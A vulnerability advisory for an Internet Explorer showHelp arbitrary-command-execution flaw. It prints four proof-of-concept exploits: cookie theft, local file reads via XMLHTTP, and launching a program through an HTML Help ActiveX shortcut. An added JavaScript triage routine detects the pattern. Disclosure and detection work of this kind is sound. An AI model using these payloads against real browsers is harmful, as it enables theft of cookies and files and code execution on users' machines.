Microsoft Internet Explorer ShowHelp Arbitrary Command Execution Vulnerability
CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept examples were provided:

Exploit 1:

    // Sandblad advisory #11 - Read your google cookie
    showHelp("file:");showHelp("http://www.google.com/");
    showHelp("javascript:alert(document.cookie)");

Exploit 2:

    // Sandblad advisory #11 - Read the file c:\test.txt
    showHelp("file:");showHelp("res://shdoclc.dll/about.dlg");
    showHelp("javascript:try{c=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){c=new ActiveXObject('Microsoft.XMLHTTP')};c.open('GET','file://c:/test.txt',false);c.send(null);alert(c.responseText)");

Exploit 3:

    // Sandblad advisory #11 - Read the file c:\test.txt
    showHelp("file:");showHelp("file://c:/test.txt");
    showHelp("javascript:alert(document.body.innerText)");

Exploit 4:

    // Sandblad advisory #11 - Run the very nice game Winmine
    showHelp("file:");showHelp("iexplore.chm");showHelp("res:");
    showHelp("javascript:location='mk:@MSITStore:C:'");
    showHelp("javascript:document.write('<object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11\\u003E<param name=Command value=ShortCut\\u003E\<param name=Item1 value=,winmine,\\u003E</object\\u003E');c.Click();");
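
A defensive triage check for the pattern the four proof of concept examples share: a showHelp() call carrying a javascript: URL, issued after earlier showHelp() calls. This is an added example, not part of the advisory or of CORE's exploit; the function names and the sample strings are constructed for illustration.

```javascript
// Added example (not from the advisory): static triage of page script for
// showHelp() calls. Only string-literal arguments are inspected; escape
// sequences inside the literal are not decoded, so treat a clean result as
// "nothing obvious", not as proof of absence.
const SHOWHELP_CALL =
  /\bshowHelp\s*\(\s*(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|([^)]*))/g;

// Return the lower-cased URL scheme, tolerating leading whitespace/control
// characters and mixed case, or null when the argument has no scheme.
function schemeOf(url) {
  const m = /^[\s\u0000-\u001f]*([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

function findShowHelpIssues(source) {
  const calls = [];
  SHOWHELP_CALL.lastIndex = 0;
  let m;
  while ((m = SHOWHELP_CALL.exec(source)) !== null) {
    const literal = m[1] !== undefined ? m[1] : m[2];
    calls.push({
      offset: m.index,
      isLiteral: literal !== undefined,
      scheme: literal !== undefined ? schemeOf(literal) : null,
    });
  }
  const findings = [];
  calls.forEach((call, i) => {
    if (call.scheme === "javascript") {
      findings.push({
        offset: call.offset,
        reason: "javascript-url",
        chained: i > 0, // preceded by other showHelp() calls, as in the PoCs
        precedingSchemes: calls.slice(0, i).map((c) => c.scheme),
      });
    } else if (!call.isLiteral) {
      findings.push({ offset: call.offset, reason: "non-literal-argument" });
    }
  });
  return findings;
}

// Constructed samples with harmless payloads.
const SAMPLE_CHAIN =
  'showHelp("file:");showHelp("http://example.test/");\n' +
  'showHelp(" JavaScript:alert(1)");';
const SAMPLE_BENIGN = 'window.showHelp("help/index.chm");';
const SAMPLE_DYNAMIC = "showHelp(target);";
```

Calls whose argument is not a plain string literal are reported separately because this check cannot see what URL they resolve to.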